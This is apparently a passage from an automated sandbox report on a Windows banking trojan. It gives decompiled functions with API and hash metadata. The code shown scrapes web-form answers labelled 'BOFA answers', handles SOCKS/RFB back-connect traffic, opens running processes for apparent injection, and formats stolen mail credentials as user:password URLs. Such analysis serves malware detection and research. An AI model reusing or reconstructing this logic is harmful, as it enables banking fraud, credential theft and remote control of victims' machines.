												if(_t186 < 0x41) {
													L39:
													_t187 = _t186;
													L40:
													__eflags = _t206 - _t187;
													if(__eflags != 0) {
														goto L91;
													}
													goto L41;
												}
												__eflags = _t186 - 0x5a;
												if(_t186 > 0x5a) {
													goto L39;
												}
												_t187 = _t186 + 0x20;
												goto L40;
											} else {
												if(_t235 == _v8) {
													L91:
													_t282 = _v32;
													if(_v32 != 0) {
														E0041540F(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
														E0040F0C0(_v28);
													}
													goto L93;
												}
											}
											L41:
											_t235 = _t235 + 1;
											_t218 = _t218 + 1;
											_t226 = _t226 + 1;
										} while (_t226 != 0x12);
										_v16 = _t235;
										goto L51;
										L88:
										_t206 = _v32 + _t178;
										_v28 = _t178;
										_t180 = E0040F0FC(_v32 + _t178,  &_v1064, _t229);
										_v9 = _v9 + 1;
										_v32 = _t238;
										 *((char*)(_t180 + _t238)) = 0;
									} while (_v9 < 3);
									goto L91;
								}
								_v16 = _v8;
								goto L28;
							}
							_t190 =  *_t233;
							__eflags = _t190 - 0x41;
							if(_t190 < 0x41) {
								L16:
								_t191 = _t190;
								L17:
								__eflags = _t203 - _t191;
								if(__eflags != 0) {
									goto L93;
								}
								goto L18;
							}
							__eflags = _t190 - 0x5a;
							if(_t190 > 0x5a) {
								goto L16;
							}
							_t191 = _t190 + 0x20;
							goto L17;
						} else {
							if(_t194 == _v8) {
								L93:
								E0040F0C0(_v36);
								goto L94;
							}
						}
						L18:
						_t194 = _t194 + 1;
						_t233 = _t233 + 1;
						_t216 = _t216 + 1;
					} while (_t216 != 9);
					_v16 = _t194;
					goto L28;
				}
				return E0040F0C0(_a4);
			}




























































    0x0040c7c1
    0x0040c7c1
    0x0040c7c1
    0x0040c7d4
    0x0040c7e0
    0x0040c7e5
    0x0040c7e5
    0x0040c7e6
    0x00000000
    0x00000000
    0x0040c7f4
    0x00000000
    0x00000000
    0x0040c7f6
    0x0040c7fd
    0x0040c80b
    0x0040c811
    0x0040c822
    0x0040c82a
    0x0040cbed
    0x00000000
    0x0040cbed
    0x0040c840
    0x0040c846
    0x0040c848
    0x00000000
    0x00000000
    0x0040c84e
    0x0040c858
    0x0040c85d
    0x0040c862
    0x0040cbec
    0x00000000
    0x0040cbec
    0x0040c868
    0x0040c86b
    0x0040c871
    0x0040c873
    0x0040c875
    0x0040c877
    0x0040c877
    0x0040c880
    0x0040c882
    0x0040c882
    0x0040c888
    0x0040c895
    0x0040c898
    0x0040c8c7
    0x0040c8ca
    0x0040c8cd
    0x0040c8d7
    0x0040c8da
    0x00000000
    0x00000000
    0x0040c8e2
    0x0040c8e3
    0x0040c8e3
    0x0040c8e5
    0x0040c8e5
    0x0040c8eb
    0x0040c903
    0x0040c908
    0x0040c90a
    0x00000000
    0x00000000
    0x0040c90c
    0x0040c90d
    0x0040c910
    0x00000000
    0x00000000
    0x00000000
    0x0040c912
    0x0040c917
    0x0040c917
    0x0040c917
    0x0040c91a
    0x0040c91a
    0x0040c920
    0x0040c924
    0x0040c928
    0x0040c92b
    0x0040c92e
    0x0040c932
    0x0040c932
    0x0040c939
    0x0040c93b
    0x0040c93d
    0x0040c940
    0x0040c942
    0x0040c945
    0x0040c94e
    0x0040c950
    0x0040c950
    0x0040c956
    0x0040c963
    0x0040c966
    0x0040c995
    0x0040c998
    0x0040c99b
    0x0040c9a5
    0x0040c9a8
    0x00000000
    0x00000000
    0x0040c9ae
    0x0040c9b5
    0x0040c9b5
    0x0040c9b5
    0x0040c9b8
    0x0040c9b8
    0x0040c9be
    0x0040c9be
    0x0040c9d3
    0x0040c9d5
    0x0040c9da
    0x0040c9dc
    0x00000000
    0x00000000
    0x0040c9de
    0x0040c9df
    0x0040c9e2
    0x00000000
    0x00000000
    0x00000000
    0x0040c9e4
    0x0040c9e9
    0x0040c9e9
    0x0040c9e9
    0x0040c9ec
    0x0040c9ec
    0x0040c9ef
    0x0040c9f1
    0x0040c9f1
    0x0040c9f4
    0x00000000
    0x00000000
    0x0040c9fa
    0x0040c9ff
    0x0040ca00
    0x0040ca00
    0x0040ca03
    0x00000000
    0x00000000
    0x00000000
    0x0040ca03
    0x0040ca09
    0x00000000
    0x00000000
    0x0040ca12
    0x0040ca13
    0x0040ca15
    0x0040ca18
    0x0040ca1c
    0x0040ca28
    0x0040ca2a
    0x00000000
    0x00000000
    0x0040ca32
    0x0040ca3a
    0x00000000
    0x00000000
    0x0040ca44
    0x0040ca47
    0x0040ca4a
    0x0040ca4c
    0x0040ca53
    0x0040ca56
    0x0040ca59
    0x0040ca5c
    0x0040ca5e
    0x0040ca61
    0x0040ca6a
    0x0040ca6c
    0x0040ca6c
    0x0040ca72
    0x0040ca7f
    0x0040ca82
    0x0040cab4
    0x0040cab7
    0x0040cab7
    0x0040caba
    0x0040cabd
    0x0040cac7
    0x0040caca
    0x00000000
    0x00000000
    0x0040cad0
    0x0040cad7
    0x0040cad7
    0x0040cad7
    0x0040cada
    0x0040cada
    0x0040cae0
    0x0040cae0
    0x0040caf5
    0x0040caf7
    0x0040cafc
    0x0040cafe
    0x00000000
    0x00000000
    0x0040cb00
    0x0040cb01
    0x0040cb04
    0x00000000
    0x00000000
    0x00000000
    0x0040cb06
    0x0040cb0b
    0x0040cb0b
    0x0040cb0b
    0x0040cb0e
    0x0040cb11
    0x0040cb11
    0x0040cb14
    0x0040cb1a
    0x0040cb1c
    0x0040cb1e
    0x0040cb22
    0x0040cb2e
    0x0040cb30
    0x00000000
    0x00000000
    0x0040cb38
    0x0040cb40
    0x00000000
    0x00000000
    0x0040cb42
    0x0040cb4e
    0x0040cb53
    0x0040cb65
    0x0040cb6b
    0x0040cb70
    0x0040cb76
    0x0040cb7c
    0x0040cb83
    0x0040cbb4
    0x0040cbb9
    0x0040cbb9
    0x0040cbb9
    0x00000000
    0x0040cbb9
    0x00000000
    0x0040cb83
    0x0040cb24
    0x0040cb29
    0x0040cb2c
    0x00000000
    0x00000000
    0x00000000
    0x0040cb2c
    0x00000000
    0x0040cb24
    0x0040cac2
    0x00000000
    0x0040cac2
    0x0040ca84
    0x0040ca86
    0x0040ca88
    0x0040ca96
    0x0040ca96
    0x0040ca99
    0x0040ca9c
    0x0040ca9e
    0x00000000
    0x00000000
    0x00000000
    0x0040ca9e
    0x0040ca8a
    0x0040ca8c
    0x00000000
    0x00000000
    0x0040ca91
    0x00000000
    0x0040ca74
    0x0040ca77
    0x00000000
    0x00000000
    0x0040ca7d
    0x0040caa4
    0x0040caa4
    0x0040caa5
    0x0040caa6
    0x0040caa9
    0x0040caaf
    0x00000000
    0x0040caaf
    0x0040ca1e
    0x0040ca23
    0x0040ca26
    0x00000000
    0x00000000
    0x00000000
    0x0040ca26
    0x00000000
    0x0040ca1e
    0x0040c9a0
    0x00000000
    0x0040c9a0
    0x0040c968
    0x0040c96a
    0x0040c96c
    0x0040c97a
    0x0040c97a
    0x0040c97d
    0x0040c980
    0x0040c982
    0x00000000
    0x00000000
    0x00000000
    0x0040c982
    0x0040c96e
    0x0040c970
    0x00000000
    0x00000000
    0x0040c975
    0x00000000
    0x0040c958
    0x0040c95b
    0x0040cbbd
    0x0040cbbf
    0x0040cbc2
    0x0040cbd3
    0x0040cbde
    0x0040cbde
    0x00000000
    0x0040cbc2
    0x0040c961
    0x0040c988
    0x0040c988
    0x0040c989
    0x0040c98a
    0x0040c98b
    0x0040c990
    0x00000000
    0x0040cb85
    0x0040cb90
    0x0040cb93
    0x0040cb96
    0x0040cb9b
    0x0040cba2
    0x0040cba5
    0x0040cba5
    0x00000000
    0x0040cbaf
    0x0040c8d2
    0x00000000
    0x0040c8d2
    0x0040c89a
    0x0040c89c
    0x0040c89e
    0x0040c8ac
    0x0040c8ac
    0x0040c8af
    0x0040c8b2
    0x0040c8b4
    0x00000000
    0x00000000
    0x00000000
    0x0040c8b4
    0x0040c8a0
    0x0040c8a2
    0x00000000
    0x00000000
    0x0040c8a7
    0x00000000
    0x0040c88a
    0x0040c88d
    0x0040cbe3
    0x0040cbe6
    0x00000000
    0x0040cbeb
    0x0040c893
    0x0040c8ba
    0x0040c8ba
    0x0040c8bb
    0x0040c8bc
    0x0040c8bd
    0x0040c8c2
    0x00000000
    0x0040c8c2
    0x0040cbf7

    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0040C7D4
    • lstrcpy.KERNEL32(?,02563E59), ref: 0040C80B
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040C822
    • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040C840
    • wnsprintfA.SHLWAPI ref: 0040CB65
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetOpenlstrcpy$wnsprintf
    • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S$`@@
    • API String ID: 3861095738-265672519
    • Opcode ID: 59b48bf62179310d243c1a4f089ba194c66bb323e8cf5d73889e107ed525d16f
    • Instruction ID: 74fa19b8dbe9ab60e097668a530311678bf45966e15a7f352280a5b63dc06522
    • Opcode Fuzzy Hash: 59b48bf62179310d243c1a4f089ba194c66bb323e8cf5d73889e107ed525d16f
    • Instruction Fuzzy Hash: 0ED1AD71A00109EBDF20DBA8C8C5BEEB7B5EB45304F2442BBD551B7282C67C6A46CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A25B, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 174stringsynchronizationnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 65%
    			E0040A25B(void* __esi, char _a4, char _a7, long _a8, char _a12) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				char _v20;
				short _v22;
				char _v24;
				signed char _v61;
				signed int _v62;
				char _v64;
				void* __edi;
				long _t45;
				signed short _t47;
				signed int _t49;
				long _t52;
				long _t53;
				char _t56;
				char _t58;
				long _t59;
				long _t60;
				long _t65;
				long _t68;
				void* _t70;
				long _t74;
				long _t76;
				void* _t78;
				intOrPtr _t79;
				long _t80;
				char _t84;
				void* _t86;
				long _t88;
				void* _t92;
				intOrPtr* _t95;
				void* _t96;
				void* _t100;
				long _t101;

				_t96 = __esi;
				_push("socks");
				_push(_a4);
				if( *0x416edc() != 0) {
					_t45 =  *0x416edc(_a4, "rfb");
					__eflags = _t45;
					if(_t45 != 0) {
						_t47 = E0040F2EB(_a4, _t86);
						_t9 = _t47 - 1; // -1
						__eflags = _t9 - 0xfffd;
						if(_t9 > 0xfffd) {
							L10:
							return 0;
						}
						L8:
						_t49 = _t47 & 0x0000ffff;
						L9:
						if(_t49 != 0) {
							_v8 = _v8 & 0x00000000;
							asm("rol ax, 0x8");
							_v16 = _t49 & 0x0000ffff;
							_t52 =  *0x416dc0(_a8, _a12, 0,  &_a8);
							__eflags = _t52;
							if(_t52 != 0) {
								goto L10;
							}
							_t53 = _a8;
							while(1) {
								__eflags = _t53;
								if(_t53 == 0) {
									break;
								}
								__eflags =  *((intOrPtr*)(_t53 + 4)) - 2;
								if(__eflags == 0) {
									_t84 =  *((intOrPtr*)(_t53 + 0x10));
									_v8 = E0040F113(__eflags,  *((intOrPtr*)(_t53 + 0x18)), _t84);
									L17:
									 *0x416dc4(_a8, _t92);
									_t93 = _v8;
									__eflags = _v8;
									if(_v8 != 0) {
										_a7 = 0;
										_t56 = E004105BC(_t93, _t84);
										_a12 = _t56;
										__eflags = _t56 - 0xffffffff;
										if(_t56 == 0xffffffff) {
											L40:
											E0040F0C0(_v8);
											_t58 = _a7;
											L41:
											return _t58;
										}
										_t88 =  *0x416df0; // 0x0
										__eflags = _t88;
										if(_t88 == 0) {
											_t59 = 0;
											__eflags = 0;
										} else {
											_t59 = E0040F521(_t88);
										}
										_push(_t96);
										_t60 = E0040A033(_t88, _t59, __eflags, _a12, 1, _t88);
										__eflags = _t60;
										if(_t60 == 0) {
											L39:
											E004108F5(_a12);
											goto L40;
										} else {
											_a7 = 1;
											while(1) {
												_t100 = E0041080E(0,  &_a12, 0x3e8, 0);
												__eflags = _t100 - 0xffffffff;
												if(_t100 != 0xffffffff) {
													goto L28;
												}
												L27:
												_t78 =  *0x416de4();
												__eflags = _t78 - 0x274c;
												if(_t78 != 0x274c) {
													goto L39;
												}
												L28:
												_t65 = WaitForSingleObject( *0x416a8c, 0);
												__eflags = _t65;
												if(_t65 == 0) {
													goto L39;
												}
												L29:
												__eflags = _t100 - 0xffffffff;
												if(_t100 == 0xffffffff) {
													do {
														_t100 = E0041080E(0,  &_a12, 0x3e8, 0);
														__eflags = _t100 - 0xffffffff;
														if(_t100 != 0xffffffff) {
															goto L28;
														}
														goto L27;
													} while (_t100 == 0xffffffff);
												}
												_t68 = E00409F48( &_v24, _t88, _a12,  &_v12);
												__eflags = _t68;
												if(_t68 == 0) {
													goto L39;
												}
												__eflags = _v20 - 2;
												_t95 = _v12;
												if(_v20 != 2) {
													L38:
													E0040F0C0(_t95);
													continue;
												}
												__eflags = _v22 - 4;
												if(_v22 != 4) {
													goto L38;
												}
												_t70 = 0x10;
												_t101 = E0040F0A8(_t70);
												__eflags = _t101;
												if(__eflags == 0) {
													goto L38;
												}
												 *((short*)(_t101 + 8)) = _v16;
												 *((intOrPtr*)(_t101 + 4)) = _t84;
												 *((intOrPtr*)(_t101 + 0xc)) =  *_t95;
												_t74 = E0040F113(__eflags, _v8, _t84);
												 *_t101 = _t74;
												__eflags = _t74;
												if(_t74 == 0) {
													L37:
													E0040F0C0(_t101);
													goto L38;
												}
												 *0x416a88 =  *0x416a88 + 1;
												_t76 = E0040C14A(_t88, E0040A1CA, _t101);
												__eflags = _t76;
												if(_t76 > 0) {
													goto L38;
												}
												 *0x416a88 =  *0x416a88 - 1;
												__eflags =  *0x416a88;
												E0040F0C0( *_t101);
												goto L37;
											}
										}
									}
									_t58 = 0;
									goto L41;
								}
								_t53 =  *(_t53 + 0x1c);
							}
							_t84 = _a4;
							goto L17;
						}
						goto L10;
					}
					_t79 =  *0x416a84; // 0x0
					__eflags = _t79 - 0xffffffff;
					if(_t79 != 0xffffffff) {
						L5:
						_a4 = 0x26;
						_t80 =  *0x416dc8(_t79,  &_v64,  &_a4);
						__eflags = _t80;
						if(_t80 != 0) {
							goto L10;
						}
						_t47 = _v62 << 0x00000008 | _v61 & 0x000000ff;
						goto L8;
					}
					_t79 = E00409164(_t86);
					 *0x416a84 = _t79;
					__eflags = _t79 - 0xffffffff;
					if(_t79 == 0xffffffff) {
						goto L10;
					}
					goto L5;
				}
				_t49 =  *0x416a94 & 0x0000ffff;
				goto L9;
			}






































    0x0040a25b
    0x0040a261
    0x0040a266
    0x0040a271
    0x0040a284
    0x0040a28a
    0x0040a28c
    0x0040a2d4
    0x0040a2d9
    0x0040a2dc
    0x0040a2e2
    0x0040a2ec
    0x00000000
    0x0040a2ec
    0x0040a2e4
    0x0040a2e4
    0x0040a2e7
    0x0040a2ea
    0x0040a2f3
    0x0040a2f7
    0x0040a2fe
    0x0040a30d
    0x0040a313
    0x0040a315
    0x00000000
    0x00000000
    0x0040a317
    0x0040a326
    0x0040a326
    0x0040a328
    0x00000000
    0x00000000
    0x0040a31d
    0x0040a321
    0x0040a345
    0x0040a351
    0x0040a32d
    0x0040a331
    0x0040a337
    0x0040a33a
    0x0040a33c
    0x0040a357
    0x0040a35b
    0x0040a360
    0x0040a363
    0x0040a366
    0x0040a46a
    0x0040a46d
    0x0040a472
    0x0040a475
    0x00000000
    0x0040a476
    0x0040a36c
    0x0040a372
    0x0040a374
    0x0040a37d
    0x0040a37d
    0x0040a376
    0x0040a376
    0x0040a376
    0x0040a37f
    0x0040a388
    0x0040a38d
    0x0040a38f
    0x0040a461
    0x0040a464
    0x00000000
    0x0040a395
    0x0040a395
    0x0040a399
    0x0040a3ab
    0x0040a3ad
    0x0040a3b0
    0x00000000
    0x00000000
    0x0040a3b2
    0x0040a3b2
    0x0040a3b8
    0x0040a3bd
    0x00000000
    0x00000000
    0x0040a3c3
    0x0040a3cb
    0x0040a3d1
    0x0040a3d3
    0x00000000
    0x00000000
    0x0040a3d9
    0x0040a3d9
    0x0040a3dc
    0x0040a399
    0x0040a3ab
    0x0040a3ad
    0x0040a3b0
    0x00000000
    0x00000000
    0x00000000
    0x0040a3b0
    0x0040a399
    0x0040a3e8
    0x0040a3ed
    0x0040a3ef
    0x00000000
    0x00000000
    0x0040a3f1
    0x0040a3f5
    0x0040a3f8
    0x0040a456
    0x0040a457
    0x00000000
    0x0040a457
    0x0040a3fa
    0x0040a3ff
    0x00000000
    0x00000000
    0x0040a403
    0x0040a409
    0x0040a40b
    0x0040a40d
    0x00000000
    0x00000000
    0x0040a417
    0x0040a41b
    0x0040a420
    0x0040a423
    0x0040a428
    0x0040a42a
    0x0040a42c
    0x0040a450
    0x0040a451
    0x00000000
    0x0040a451
    0x0040a42e
    0x0040a43a
    0x0040a43f
    0x0040a441
    0x00000000
    0x00000000
    0x0040a443
    0x0040a443
    0x0040a44b
    0x00000000
    0x0040a44b
    0x0040a399
    0x0040a38f
    0x0040a33e
    0x00000000
    0x0040a33e
    0x0040a323
    0x0040a323
    0x0040a32a
    0x00000000
    0x0040a32a
    0x00000000
    0x0040a2ea
    0x0040a28e
    0x0040a293
    0x0040a296
    0x0040a2a7
    0x0040a2b0
    0x0040a2b7
    0x0040a2bd
    0x0040a2bf
    0x00000000
    0x00000000
    0x0040a2cc
    0x00000000
    0x0040a2cc
    0x0040a298
    0x0040a29d
    0x0040a2a2
    0x0040a2a5
    0x00000000
    0x00000000
    0x00000000
    0x0040a2a5
    0x0040a273
    0x00000000

    APIs
    • lstrcmpi.KERNEL32(?,socks), ref: 0040A269
    • lstrcmpi.KERNEL32(?,rfb), ref: 0040A284
    • getsockname.WS2_32(00000000,?,?), ref: 0040A2B7
    • getaddrinfo.WS2_32(?,?,00000000,?), ref: 0040A30D
    • FreeAddrInfoW.WS2_32(?), ref: 0040A331
    • WSAGetLastError.WS2_32(?,000003E8,00000000,?,?,?,?,?), ref: 0040A3B2
    • WaitForSingleObject.KERNEL32(00000000,?,000003E8,00000000,?,?,?,?,?), ref: 0040A3CB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcmpi$AddrErrorFreeInfoLastObjectSingleWaitgetaddrinfogetsockname
    • String ID: &$rfb$socks
    • API String ID: 685222424-3548288392
    • Opcode ID: ea518c76d34beccc2495a752093e9d8d48186725c312375eb382ba120c69b5d3
    • Instruction ID: ce68a77d7c3ecf8f393eda33a0cffa13b385a0ea53feacbb8a8055cb473090f5
    • Opcode Fuzzy Hash: ea518c76d34beccc2495a752093e9d8d48186725c312375eb382ba120c69b5d3
    • Instruction Fuzzy Hash: 3C51BF34500305ABCB20AF65CC49AEE3BA8AF00354F14817AF825BB2E1D779D965DB5E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E641, Relevance: 16.6, APIs: 11, Instructions: 105networkfileCOMMON
    Download Yara Rule
    APIs
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E64F
    • ResetEvent.KERNEL32(?), ref: 0040E67D
    • SetEvent.KERNEL32(?), ref: 0040E6BF
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E6C6
    • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040E6EF
    • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040E705
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E712
    • InternetReadFile.WININET(?,?,?,?), ref: 0040E72A
    • InternetReadFileExA.WININET(?,?,?,?), ref: 0040E744
    • InternetReadFileExW.WININET(?,?,?,?), ref: 0040E758
    • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040E766
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
    • String ID:
    • API String ID: 830436639-0
    • Opcode ID: 178fef782297f701932f832b3a27cd04d67d8101068307ee0276cb8a94bd58ea
    • Instruction ID: 24679c4264759586a79c1bb75c3a59ae3f99d2c15d7f0d2fdf2446b1418ede4c
    • Opcode Fuzzy Hash: 178fef782297f701932f832b3a27cd04d67d8101068307ee0276cb8a94bd58ea
    • Instruction Fuzzy Hash: F1418C71500208FFDF129F61EC48ADA7F7AFB04314F218866F911A61A1C73AD9A1DB98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A6A0, Relevance: 16.6, APIs: 11, Instructions: 78threadprocessstringCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E0040A6A0() {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				int _v20;
				short _v544;
				long _v572;
				void* _v580;
				void* __edi;
				intOrPtr _t20;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t36;
				void* _t38;

				_t20 =  *0x416c34; // 0x25df5a8
				_t1 = _t20 + 0x2c; // 0x25df908
				_v16 = E0040B37A(0,  *_t1, 4, 0, 0, 0, 0);
				_t36 = GetCurrentThread();
				_v20 = GetThreadPriority(_t36);
				SetThreadPriority(_t36, 1);
				_v12 = 3;
				do {
					_v580 = 0x22c;
					_t25 = CreateToolhelp32Snapshot(2, 0);
					_t37 =  &_v580;
					_v8 = _t25;
					Process32FirstW(_t25,  &_v580);
					while(_t25 != 0) {
						_t26 = _v572;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags = _t26 -  *0x416d78; // 0x12fc
							if(__eflags != 0) {
								__eflags = _t26 - _v16;
								if(_t26 != _v16) {
									_t28 =  *0x416c34; // 0x25df5a8
									_t10 = _t28 + 0x50; // 0x25dfb10
									_t30 = lstrcmpiW( &_v544,  *_t10);
									__eflags = _t30;
									if(_t30 != 0) {
										_t38 = OpenProcess(0x43a, 0, _v572);
										__eflags = _t38;
										if(_t38 != 0) {
											_push(_v572);
											E0040776D(_t37, _t38);
											CloseHandle(_t38);
										}
									}
								}
							}
						}
						_t25 = Process32NextW(_v8,  &_v580);
					}
					CloseHandle(_v8);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
				} while ( *_t17 != 0);
				return SetThreadPriority(_t36, _v20);
			}


















    0x0040a6a9
    0x0040a6b9
    0x0040a6c1
    0x0040a6ca
    0x0040a6d6
    0x0040a6d9
    0x0040a6df
    0x0040a6e6
    0x0040a6e9
    0x0040a6f3
    0x0040a6f9
    0x0040a701
    0x0040a704
    0x0040a776
    0x0040a70c
    0x0040a712
    0x0040a714
    0x0040a716
    0x0040a71c
    0x0040a71e
    0x0040a721
    0x0040a723
    0x0040a728
    0x0040a732
    0x0040a738
    0x0040a73a
    0x0040a74e
    0x0040a750
    0x0040a752
    0x0040a754
    0x0040a75a
    0x0040a760
    0x0040a760
    0x0040a752
    0x0040a73a
    0x0040a721
    0x0040a71c
    0x0040a770
    0x0040a770
    0x0040a77d
    0x0040a783
    0x0040a783
    0x0040a783
    0x0040a79a

    APIs
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • GetCurrentThread.KERNEL32 ref: 0040A6C4
    • GetThreadPriority.KERNEL32(00000000), ref: 0040A6CD
    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 0040A6D9
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A6F3
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040A704
    • lstrcmpiW.KERNEL32(?,025DFB10), ref: 0040A732
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 0040A748
    • CloseHandle.KERNEL32(00000000), ref: 0040A760
    • Process32NextW.KERNEL32(?,0000022C), ref: 0040A770
    • CloseHandle.KERNEL32(?), ref: 0040A77D
    • SetThreadPriority.KERNEL32(00000000,?), ref: 0040A790
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
    • String ID:
    • API String ID: 2830737922-0
    • Opcode ID: ffb84d6495e197df523e2169df8f562549ae68d509439645d1dc38bffc1f7429
    • Instruction ID: b1eca715c35784697980cff18624b3c50065e512fa52b271b0e4a4991b01286d
    • Opcode Fuzzy Hash: ffb84d6495e197df523e2169df8f562549ae68d509439645d1dc38bffc1f7429
    • Instruction Fuzzy Hash: BE211971900218ABCF20ABA1ED8DEDE7B78FF04354F0680A5F109A21A0D774DA91CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040EC7F, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 279COMMON
    Download Yara Rule
    C-Code - Quality: 73%
    			E0040EC7F(void* __eax, int _a4, int _a8) {
				int _v24;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed int _v32;
				signed int _v34;
				int _v36;
				char _v37;
				char _v49;
				void* __esi;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t82;
				int _t85;
				int _t97;
				int _t99;
				int _t101;
				int _t103;
				int _t105;
				int _t107;
				void* _t108;
				int _t110;
				int _t117;
				int _t128;
				signed int _t129;
				char* _t133;
				intOrPtr _t134;
				int _t140;
				int _t147;
				int _t149;
				intOrPtr _t151;
				int _t154;
				int _t157;

				_t74 = __eax;
				_t149 = _a8;
				_t154 = __eax;
				if(( *0x416cd0 & 0x00000002) == 0) {
					L3:
					__eflags = _t149 - 3;
					if(_t149 < 3) {
						L72:
						return _t74;
					}
					_t74 = 0;
					__eflags = _t154;
					if(_t154 == 0) {
						goto L72;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						goto L72;
					}
					_v28 = 0;
					_v32 = 0;
					_t75 =  *_t154;
					__eflags = _t75 - 0x55;
					if(_t75 != 0x55) {
						L12:
						__eflags = _t75 - 0x50;
						if(_t75 != 0x50) {
							while(1) {
								L40:
								__eflags = _t149 - 1;
								if(_t149 <= 1) {
									break;
								}
								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
								__eflags = _t76 - 0xd;
								if(_t76 == 0xd) {
									L39:
									_t149 = _t149 - 1;
									__eflags = _t149;
									continue;
								}
								__eflags = _t76 - 0xa;
								if(_t76 != 0xa) {
									break;
								}
								goto L39;
							}
							_t74 = _t149 - 3;
							__eflags = _t74 - 1;
							if(_t74 > 1) {
								goto L72;
							}
							 *0x416fe8(0x417048);
							_t128 = E0040EB48(_a4);
							_v32 = _t128;
							__eflags = _t128;
							if(_t128 == 0) {
								L71:
								_t74 =  *0x416fec(0x417048);
								goto L72;
							}
							__eflags =  *(_t128 + 4);
							if( *(_t128 + 4) == 0) {
								L69:
								_push(0);
								L70:
								E0040EBDD(_t128);
								goto L71;
							}
							__eflags =  *(_t128 + 8);
							if( *(_t128 + 8) == 0) {
								goto L69;
							}
							__eflags = _t149 - 3;
							if(_t149 != 3) {
								_t129 = 4;
								__eflags = _t149 - _t129;
								if(_t149 != _t129) {
									goto L71;
								}
								_t151 =  *0x416c34; // 0x25df5a8
								_t47 = _t151 + 0x130; // 0x2563cf1
								_t141 = _t129;
								_t82 = E0040F547(_t129, _t154, _t129,  *_t47);
								__eflags = _t82;
								if(_t82 == 0) {
									L55:
									_v37 = 1;
									L59:
									_t128 = _v28;
									L60:
									_v28 = 0x10;
									_t85 =  *0x416da0(_a4,  &_v24,  &_v28);
									__eflags = _t85;
									if(_t85 != 0) {
										L64:
										__eflags = _v49 - 2;
										if(_v49 != 2) {
											L67:
											_push(0);
											goto L70;
										}
										_t133 = "pop3";
										L66:
										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
										_push(_v29 & 0x000000ff);
										_push(_v30 & 0x000000ff);
										_push(_v31 & 0x000000ff);
										_push(_v32 & 0x000000ff);
										_push( *(_t128 + 8));
										_push( *(_t128 + 4));
										__eflags = _v49 - 1;
										__eflags = (_v49 != 1) + 0x64;
										E0041540F(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
										goto L67;
									}
									_t97 = E00406B02( &_v36);
									__eflags = _t97;
									if(_t97 != 0) {
										goto L64;
									}
									__eflags = _v49 - 1;
									if(_v49 != 1) {
										goto L64;
									}
									_t134 =  *0x416c34; // 0x25df5a8
									_t61 = _t128 + 4; // 0x0
									_t62 = _t134 + 0x144; // 0x2563d39
									_t99 = E0040F547(_t141 | 0xffffffff,  *_t62, _t141 | 0xffffffff,  *_t61);
									__eflags = _t99;
